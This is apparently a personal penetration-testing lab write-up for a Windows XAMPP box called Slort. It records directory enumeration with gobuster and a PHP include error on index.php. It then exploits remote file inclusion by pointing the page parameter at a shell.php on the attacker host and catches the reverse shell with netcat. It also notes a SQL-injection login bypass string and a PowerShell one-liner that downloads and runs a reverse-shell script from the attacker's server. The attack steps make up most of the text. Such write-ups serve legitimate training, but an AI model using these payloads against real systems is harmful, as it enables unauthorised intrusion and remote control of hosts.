4 :4443 xampp

http://192.168.105.53:4443/dashboard/
XAMPP Splash Landing page

http://192.168.105.53:4443/dashboard/phpinfo.php
PHP Version 7.4.6
System 	Windows NT SLORT 10.0 build 18363 (Windows 10) AMD64
Architecture 	x64 

$ gobuster dir -u http://192.168.105.53:4443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
2021/08/13 15:58:00 Starting gobuster in directory enumeration mode
===============================================================
/site                 (Status: 301) [Size: 346] [--> http://192.168.105.53:4443/site/]
/Index.php            (Status: 302) [Size: 0] [--> http://192.168.105.53:4443/dashboard/]
/applications.html    (Status: 200) [Size: 3607]
/index.php            (Status: 302) [Size: 0] [--> http://192.168.105.53:4443/dashboard/]
/img                  (Status: 301) [Size: 345] [--> http://192.168.105.53:4443/img/]
/examples             (Status: 503) [Size: 1060]

http://192.168.105.53:4443/site/index.php?page=main.php
Slort

$ gobuster dir -u http://192.168.105.53:4443/site -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
2021/08/13 15:58:57 Starting gobuster in directory enumeration mode
===============================================================
/services.php         (Status: 200) [Size: 11819]
/contact.php          (Status: 200) [Size: 8984]
/main.php             (Status: 200) [Size: 12541]
/Images               (Status: 301) [Size: 353] [--> http://192.168.105.53:4443/site/Images/]
/about.php            (Status: 200) [Size: 15439]
/index.php            (Status: 301) [Size: 27] [--> index.php?page=main.php]
/css                  (Status: 301) [Size: 350] [--> http://192.168.105.53:4443/site/css/]
/About.php            (Status: 200) [Size: 15439]
/Contact.php          (Status: 200) [Size: 8984]
/Index.php            (Status: 301) [Size: 27] [--> index.php?page=main.php]
/license.txt          (Status: 200) [Size: 17128]
/portfolio.php        (Status: 200) [Size: 11865]
/js                   (Status: 301) [Size: 349] [--> http://192.168.105.53:4443/site/js/]
/README.txt           (Status: 200) [Size: 781]
/Services.php         (Status: 200) [Size: 11819]
/images               (Status: 301) [Size: 353] [--> http://192.168.105.53:4443/site/images/]
/readme.txt           (Status: 200) [Size: 781]


http://192.168.105.53:4443/site/index.php?page='
Warning: include('): failed to open stream: No such file or directory in C:\xampp\htdocs\site\index.php on line 4
Warning: include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in C:\xampp\htdocs\site\index.php on line 4

[+] use payload : user & pass :  '=' 'OR'

# not sure how to make LFI work
# trying RFI
# works

http://192.168.105.53:4443/site/index.php?page=http://192.168.49.105/shell.php
$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.49.105] from (UNKNOWN) [192.168.105.53] 49835
SOCKET: Shell has connected! PID: 2996
Microsoft Windows [Version 10.0.18363.900]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\site>whoami
slort\rupert

# PS shell using powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.49.105/rev.ps1')
Previous5 box enumNext3 :8080 xampp

Last updated